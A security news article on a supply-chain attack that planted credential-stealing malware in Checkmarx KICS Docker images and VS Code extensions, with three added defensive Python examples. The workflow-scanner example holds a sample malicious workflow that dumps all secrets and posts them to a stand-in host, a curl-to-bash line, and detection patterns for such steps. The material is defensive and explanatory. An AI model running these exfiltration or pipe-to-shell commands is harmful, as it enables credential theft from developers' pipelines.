
Checkmarx suffers second compromise within a month, malware found in developer tools

Checkmarx, an application security company that provides developer-focused security testing tools, has suffered a second compromise within a month after attackers injected credential-stealing malware into widely used software distributed through Docker Hub and Visual Studio Code extensions.



The breach affected the company’s KICS tool (Keeping Infrastructure as Code Secure), a free utility that scans infrastructure-as-code for vulnerabilities, misconfigurations and compliance issues. Its Docker image has been pulled more than 5 million times, which amplifies the potential impact of the incident.


Malicious code was embedded into the official KICS Docker images on Docker Hub by overwriting existing images while keeping their trusted version tags, including v2.1.20, v2.1.20-debian, alpine, debian and latest. Because a tag is a mutable pointer rather than a content hash, developers pulling by tag silently received the modified image while expecting a previously verified release. A new version, v2.1.21, was also published with the same malicious functionality.
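The tag re-pointing described above is only invisible to consumers who pull by tag. As an added example (not Checkmarx or KICS code), the script below classifies image references in Dockerfiles and CI YAML by whether they are digest-pinned, and compares a previously recorded tag-to-digest lock against the digests a registry serves now, which is how the v2.1.20 overwrite and the new v2.1.21 tag would surface. The lock file, the "observed" digests and the CI snippet are constructed placeholders, not real KICS digests.

```python
"""Audit container image references for mutable tags and detect tag drift.

Added example: this is not Checkmarx or KICS code. The lock, the "observed"
digests and the CI snippet are constructed placeholders, not real KICS
digests. The behaviour modelled is a tag such as v2.1.20 being re-pointed
at a different image while the tag name stays the same.
"""
import re

# [registry/]repository[:tag][@sha256:hex]  (registries with a port are not handled)
_IMAGE_RE = re.compile(
    r"^(?P<name>[a-z0-9][a-z0-9._/-]*?)"
    r"(?::(?P<tag>[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}))?"
    r"(?:@(?P<digest>sha256:[0-9a-f]{64}))?$"
)

# Image references in a Dockerfile FROM line (flags such as --platform are skipped)
# or a YAML 'image:' key as used by compose files and GitHub Actions job containers.
_REF_IN_LINE = re.compile(
    r"(?:^\s*FROM\s+(?:--\S+\s+)*|^\s*-?\s*image:\s*)[\"']?(?P<ref>[A-Za-z0-9._/:@-]+)",
    re.MULTILINE,
)


def parse_image_ref(ref):
    m = _IMAGE_RE.match(ref.strip())
    if not m:
        raise ValueError(f"unparseable image reference: {ref!r}")
    return m.groupdict()


def pin_status(ref):
    """How a reference resolves at pull time."""
    p = parse_image_ref(ref)
    if p["digest"]:
        return "pinned"        # content-addressed: re-pointing a tag cannot change the pull
    if p["tag"] in (None, "latest"):
        return "floating"      # whatever the publisher pushed most recently
    return "mutable-tag"       # looks like a fixed release, but the tag can be re-pointed


def find_unpinned(text):
    """Return (reference, status) for every reference in text that is not digest-pinned."""
    findings = []
    for m in _REF_IN_LINE.finditer(text):
        ref = m.group("ref")
        status = pin_status(ref)
        if status != "pinned":
            findings.append((ref, status))
    return findings


def detect_tag_drift(lock, observed):
    """Compare a recorded tag->digest lock with the digests a registry serves now.

    Returns (repointed, new_tags): tags whose digest changed since they were
    recorded, and tags that did not exist when the lock was taken.
    """
    repointed = {
        tag: (lock[tag], observed[tag])
        for tag in lock
        if tag in observed and observed[tag] != lock[tag]
    }
    new_tags = sorted(tag for tag in observed if tag not in lock)
    return repointed, new_tags


# Constructed sample data (placeholder digests, not real ones).
LOCK = {
    "checkmarx/kics:v2.1.20": "sha256:" + "a" * 64,
    "checkmarx/kics:alpine": "sha256:" + "b" * 64,
}
OBSERVED = {
    "checkmarx/kics:v2.1.20": "sha256:" + "c" * 64,  # same tag, different content
    "checkmarx/kics:alpine": "sha256:" + "b" * 64,   # unchanged
    "checkmarx/kics:v2.1.21": "sha256:" + "d" * 64,  # tag that did not exist before
}
SAMPLE_CI = """\
FROM --platform=linux/amd64 checkmarx/kics:latest AS scanner
services:
  kics:
    image: checkmarx/kics:v2.1.20
  pinned:
    image: "checkmarx/kics:alpine@sha256:%s"
""" % ("b" * 64)

if __name__ == "__main__":
    for ref, status in find_unpinned(SAMPLE_CI):
        print(f"{status:12} {ref}")
    repointed, new_tags = detect_tag_drift(LOCK, OBSERVED)
    for tag, (was, now) in repointed.items():
        print(f"RE-POINTED   {tag}: {was[:19]}... -> {now[:19]}...")
    for tag in new_tags:
        print(f"NEW TAG      {tag}")
```

In practice the lock is whatever your build recorded when the image was last reviewed (for example the `RepoDigests` value from `docker image inspect`), and the observed side is the digest the registry returns for the same tag today; a re-pointed tag shows up as a digest change with no corresponding release note.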


The attack also extended to Visual Studio Code through compromised extensions, including Checkmarx Developer Assist and Checkmarx AST-Results. These tools are commonly integrated into development workflows, increasing the likelihood of widespread exposure across software development environments.


The altered KICS images were modified to collect and exfiltrate data: the malware generates scan reports containing sensitive configuration data, encrypts them, and transmits them to attacker-controlled servers. Because KICS is used to analyze infrastructure-as-code files that often include credentials, the compromised tool created a pathway for harvesting sensitive data at scale.


The malicious VS Code extensions contained a component identified as “mcpAddon.js,” a multi-stage loader designed to steal credentials and propagate further infections. It retrieves additional code from a hardcoded GitHub link and executes it without any user confirmation or integrity check, so whatever that link serves at run time is what gets executed.
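The load-and-run behaviour attributed to mcpAddon.js is a pattern worth seeing next to its safe counterpart. The following is an added example, not code from the compromised extensions or from Checkmarx: it shows a loader that executes whatever a URL serves beside one that refuses to run anything whose SHA-256 does not match a digest fixed at build time. The URL, the payloads and the in-memory stand-in for the remote host are constructed so the example runs offline.

```python
"""A fetch-and-execute loader with and without an integrity gate.

Added example, not code from the compromised extensions or from Checkmarx.
It models the pattern the article attributes to mcpAddon.js (code pulled from
a hardcoded URL and run unchecked) beside the pinned-digest alternative. The
URL, the payloads and the in-memory "remote" are constructed so it runs offline.
"""
import hashlib
import hmac

# Stand-in for the remote host; a dict plays the role of the hosted file.
_REMOTE = {
    "https://example.invalid/addon/stage2.py": "RESULT = 'benign stage 2'\n",
}


def fetch(url):
    """Pretend network fetch: returns whatever the 'remote' currently serves."""
    return _REMOTE[url]


def digest_of(source):
    return hashlib.sha256(source.encode()).hexdigest()


def load_unverified(url):
    """The unsafe pattern: whatever the URL serves right now is executed."""
    ns = {}
    exec(fetch(url), ns)   # nothing ties this to what the author originally shipped
    return ns.get("RESULT")


def load_pinned(url, expected_sha256):
    """Execute only if the fetched source hashes to a digest fixed at build time.

    The pin binds execution to content, not location: a repointed URL, a
    hijacked repository or an edited file produces a refusal instead of code
    execution. Legitimately updating the payload means shipping a new pin.
    """
    body = fetch(url)
    actual = digest_of(body)
    if not hmac.compare_digest(actual, expected_sha256):
        raise RuntimeError(f"integrity check failed for {url}: got {actual[:12]}...")
    ns = {}
    exec(body, ns)
    return ns.get("RESULT")


def replace_remote(url, new_source):
    """Simulate the hosted file being swapped (compromised repo or account)."""
    _REMOTE[url] = new_source


def run_scenario():
    """Outcomes before and after the hosted payload is swapped.

    Returns (unverified_before, pinned_before, unverified_after, pinned_after).
    """
    url = "https://example.invalid/addon/stage2.py"
    original = fetch(url)
    pin = digest_of(original)
    try:
        before = (load_unverified(url), load_pinned(url, pin))
        replace_remote(url, "RESULT = 'tokens exfiltrated'\n")
        unverified_after = load_unverified(url)
        try:
            pinned_after = load_pinned(url, pin)
        except RuntimeError:
            pinned_after = "refused"
    finally:
        replace_remote(url, original)   # restore so repeated runs behave the same
    return before + (unverified_after, pinned_after)


if __name__ == "__main__":
    print(run_scenario())
```

The pinned loader is deliberately inconvenient: updating the second stage requires a new release of the first stage carrying the new digest, which is exactly the review step the unchecked version skips.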


The malware is capable of extracting a wide range of sensitive data, including GitHub authentication tokens, AWS credentials, Microsoft Azure tokens, Google Cloud credential databases, npm configuration files, SSH keys, environment variables, and other configuration files tied to development environments. Stolen data is compressed, encrypted, and exfiltrated to external servers as well as attacker-controlled public repositories created under compromised user accounts.


Attackers have used stolen GitHub tokens to inject unauthorized GitHub Actions workflows, enabling further credential harvesting and automated spread of malicious code into repositories and software packages. This propagation mechanism allows the compromise to extend into additional development pipelines and downstream dependencies.


Developers and organizations that downloaded or used the affected tools are advised to treat the incident as both a credential exposure and a CI/CD pipeline compromise. Recommended measures include rotating all potentially exposed credentials, auditing GitHub repositories for unauthorized changes (including newly added workflows), reviewing npm packages for tampering, and analyzing cloud access logs for unusual activity. Because stolen tokens were used to plant workflows, rotation alone does not close the door: a workflow left in place can harvest the replacement credentials.
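Both the workflow-injection propagation described above and the advice to audit repositories for unauthorized changes come down to the same triage task: find workflow files that were not there before and flag steps that behave like credential harvesters. The script below is an added example, not a Checkmarx or GitHub tool; its indicators are generic heuristics chosen for illustration rather than the campaign's actual workflow content, and the sample workflow and file lists are constructed.

```python
"""Triage GitHub Actions workflow files for steps that look like injected
credential harvesters, and list workflow files that appeared since a baseline.

Added example, not a Checkmarx or GitHub tool. The indicators are generic
heuristics chosen for illustration, not the campaign's actual workflow content,
and the sample workflow and file lists are constructed.
"""
import re

# (rule name, pattern, why it matters). Heuristics: expect to tune them.
RULES = [
    ("write-all-token", re.compile(r"^\s*permissions:\s*write-all\b"),
     "GITHUB_TOKEN granted write on every scope"),
    ("secrets-dump", re.compile(r"toJSON\(\s*secrets\s*\)"),
     "serialises every repository secret into the job"),
    ("secret-to-network",
     re.compile(r"secrets\.\w+.*\b(?:curl|wget)\b|\b(?:curl|wget)\b.*secrets\.\w+"),
     "a secret and an outbound HTTP tool on the same line"),
    ("pipe-to-shell", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b"),
     "remote script executed unreviewed and unpinned"),
    ("encoded-command", re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
     "embedded payload decoded at run time"),
    ("env-exfil", re.compile(r"\benv\b.*\|\s*(?:curl|wget)\b"),
     "environment (where tokens often live) piped to the network"),
]


def scan_workflow(text):
    """Return (line_no, rule, reason, line) for every line matching a rule."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for name, pattern, reason in RULES:
            if pattern.search(line):
                findings.append((no, name, reason, line.strip()))
    return findings


def new_workflow_files(baseline, current):
    """Workflow paths present now that were not in the reviewed baseline."""
    return sorted(set(current) - set(baseline))


# Constructed sample workflow: a normal build with a planted 'telemetry' step.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - name: telemetry
        run: |
          echo '${{ toJSON(secrets) }}' | base64 -w0 > /tmp/s
          curl -s -X POST --data-binary @/tmp/s https://example.invalid/collect
      - run: curl -fsSL https://example.invalid/setup.sh | bash
"""
# Constructed file lists: what was reviewed before versus what the repo has now.
BASELINE_FILES = [".github/workflows/ci.yml"]
CURRENT_FILES = [".github/workflows/ci.yml", ".github/workflows/telemetry.yml"]

if __name__ == "__main__":
    for path in new_workflow_files(BASELINE_FILES, CURRENT_FILES):
        print(f"NEW WORKFLOW  {path}")
    for no, name, reason, line in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {no:3}  {name:18} {reason}\n           {line}")
```

Line-based matching misses a harvester split across several `run:` lines, so treat a hit as a reason to read the whole job rather than as a verdict; the baseline for `new_workflow_files` should come from the last reviewed commit, not from the current default branch, since that is what an attacker with a stolen token has already edited.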


The campaign has been linked to TeamPCP, a financially motivated threat group that emerged in late 2025. The group has conducted a sustained supply chain attack across multiple platforms, including GitHub, npm, OpenVSX, PyPI, and Docker Hub.

© 2025, Lyonsdown Limited. teiss® is a registered trademark of Lyonsdown Ltd. VAT registration number: 830519543